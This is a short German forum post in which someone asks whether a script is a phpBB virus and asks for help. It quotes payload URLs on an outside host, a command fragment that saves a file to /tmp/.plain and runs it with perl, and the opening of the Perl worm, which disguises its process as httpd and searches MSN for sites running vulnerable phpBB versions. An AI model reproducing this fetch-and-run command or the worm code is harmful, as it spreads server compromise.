ist dieses ein phpBB-Virus:
http://www.precisa-se.com.br/images/linuxdaybot.txt
http://www.precisa-se.com.br/images/linuxday.txt -O /tmp/.plain ;perl /tmp/.plain
Vielleicht könnt ihr mir helfen###### psyclon.br@gmail.com ######
use strict;
use IO::Socket;
use IO::Handle;
my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;
sub fetch();
sub remote($);
sub http_query($);
sub encode($);
sub fetch(){
my $rnd=(int(rand(9999)));
my $s= (int(rand(1000)));
if ($rnd>1000) { $s= (int(rand(100)))}
my @str=(
"topic+%22by+phpBB+2.0.4%22+",
"topic+%22by+phpBB+2.0.5%22+",
"topic+%22by+phpBB+2.0.6%22+",
"topic+%22by+phpBB+2.0.7%22+",
"topic+%22by+phpBB+2.0.8%22+",
"topic+%22by+phpBB+2.0.9%22+",
"topic+%22by+phpBB+2.0.10%22+",
"topic+%22by+phpBB+2.0.3%22+",
);
my $query="search.msn.com.br/results.aspx?q=";
$query.=$str[(rand(scalar(@str)))].$rnd;
$query.="&first=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/msn|cache|hotmail/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
.....
.......
.........
............
...............
danke
apso
